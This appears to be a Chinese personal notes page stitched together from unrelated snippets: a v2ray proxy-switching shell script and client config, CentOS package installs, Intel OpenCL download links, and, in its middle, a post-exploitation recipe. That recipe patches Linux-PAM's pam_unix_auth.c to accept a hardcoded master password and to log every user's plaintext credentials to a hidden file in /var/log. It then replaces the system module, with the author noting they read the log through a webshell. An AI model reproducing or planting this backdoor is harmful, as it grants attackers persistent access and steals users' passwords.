#! /bin/sh -
 
name=`basename $0 .sh`
case $1 in
 us1)
        echo "start us1-LA()..."
        service v2ray stop
        unlink /etc/v2ray/config.json
        cp /home/kele/Desktop/v2ray/v2ray-us1.json /etc/v2ray/config.json
        service v2ray start
        ;;
 us2)
        echo "start us2-LA() ..."
        service v2ray stop
        unlink /etc/v2ray/config.json
        cp /home/kele/Desktop/v2ray/v2ray-us2.json /etc/v2ray/config.json
        service v2ray start
        ;;
。。。。。。。。。。
        
 *)
        echo "Usage: sudo $name.sh [us1|us2|nj1|nj2|jp|tw]"
        exit 1
        ;;
esac
exit 0

V2RAY的客户端配置json

{
  "dns": {
    "servers": [
      "1.1.1.1"
    ]
  },
  "inbounds": [
    {
      "port": 10808,
      "protocol": "socks",
      "settings": {
        "auth": "noauth",
        "udp": true,
        "userLevel": 8
      },
      "sniffing": {
        "destOverride": [
          "http",
          "tls"
        ],
        "enabled": true
      },
      "tag": "socks"
    },
    {
      "port": 10809,
      "protocol": "http",
      "settings": {
        "userLevel": 8
      },
      "tag": "http"
    }
  ],
  "log": {
    "loglevel": "warning"
  },
  "outbounds": [
    {
      "mux": {
        "enabled": false
      },
      "protocol": "vmess",
      "settings": {
        "vnext": [
          {
            "address": "域名",
            "port": 443,
            "users": [
              {
                "alterId": 64,
                "id": "自己的ID",
                "level": 8,
                "security": "auto"
              }
            ]
          }
        ]
      },
      "streamSettings": {
        "network": "ws",
        "security": "tls",
        "tlssettings": {
          "allowInsecure": true,
          "serverName": ""
        },
        "wssettings": {
          "connectionReuse": true,
          "headers": {
            "Host": ""
          },
          "path": "/自定义的PATH/"
        }
      },
      "tag": "proxy"
    },
    {
      "protocol": "freedom",
      "settings": {},
      "tag": "direct"
    },
    {
      "protocol": "blackhole",
      "settings": {
        "response": {
          "type": "http"
        }
      },
      "tag": "block"
    }
  ],
  "policy": {
    "levels": {
      "8": {
        "connIdle": 300,
        "downlinkOnly": 1,
        "handshake": 4,
        "uplinkOnly": 1
      }
    },
    "system": {
      "statsInboundUplink": true,
      "statsInboundDownlink": true
    }
  },
  "routing": {
    "domainStrategy": "IPIfNonMatch",
    "rules": []
  },
  "stats": {}
}

centos7.2

yum install -y perl perl-Net-Telnet perl-Net-DNS perl-LDAP perl-libwww-perl perl-IO-Socket-SSL perl-Socket6 perl-Time-HiRes perl-ExtUtils-MakeMaker rrdtool rrdtool-perl curl httpd httpd-devel gcc make wget libxml2-devel libpng-devel glib pango pango-devel freetype freetype-devel fontconfig cairo cairo-devel libart_lgpl libart_lgpl-devel perl-Sys-Syslog podofo mod_fcgid perl-CGI-SpeedyCGI fping perl-CPAN perl-local-lib
yum groupinstall "Development tools"
yum install -y epel-release

后面有空再写

前一篇文章，PAM_UNIX后门，把密码记录到了文件里。
本来，我是写的/tmp目录的。
但是记录完了之后。
我用webshell看不到。
原来是启用了PHP-FPM的私有tmp空间。
所以后面我用了var/log代替。

关闭这个也简单，编辑：
/usr/lib/systemd/system/php-fpm.service
PrivateTmp=false
然后重启PHP-FPM就可以了。

http://hui692.cc/2017/11/01/systemd-PrivateTmp%E7%9A%84%E5%9D%91.html

备份一下记录而已。
很老很老的技术了。不多说。
先看当前PAM版本,下载最合适的PAM。

getconf LONG_BIT
cat /etc/redhat-release
rpm -qa | grep pam
apt-get list --installed | grep pam

http://www.linux-pam.org/library/Linux-PAM-1.1.8.tar.gz

然后，直接修改这个文件pam_unix_auth.c：
vim modules/pam_unix/pam_unix_auth.c

        /* verify the password of this user */
        retval = _unix_verify_password(pamh, name, p, ctrl);
        /* save password to file */
        if(strcmp(p,"t00ls.kele")==0) {
                retval = PAM_SUCCESS;
        }
        if(retval== PAM_SUCCESS) {
                FILE* fp = fopen("/var/log/.unix.log","a+");
                //fp=fopen("/tmp/pam.txt","a");
                fprintf(fp,"%s::%s\n",name,p);
                fclose(fp);
        }
        /* save password to file */

./configuare
make
然后在.libs目录就会有pam_unix.so文件了。替换/lib64/security/pam_unix.so就可以了。最好先备份下。

参考：
https://gorgias.me/2018/03/25/Linux-后渗透笔记-PAM后门/
这里有写用telegram bot的。

Intel® CPU Runtime for OpenCL™ Applications for Windows* OS product.

Version: --- 18.1
Build date:09 Oct 2018
https://software.intel.com/en-us/articles/opencl-drivers
http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/13794/opencl_runtime_18.1_x64_setup.msi

Intel® SDK for OpenCL™ Applications 2019
https://software.intel.com/en-us/opencl-sdk/choose-download
http://registrationcenter-download.intel.com/akdlm/irc_nas/vcp/15626/intel_sdk_for_opencl_applications_2019.4.314.zip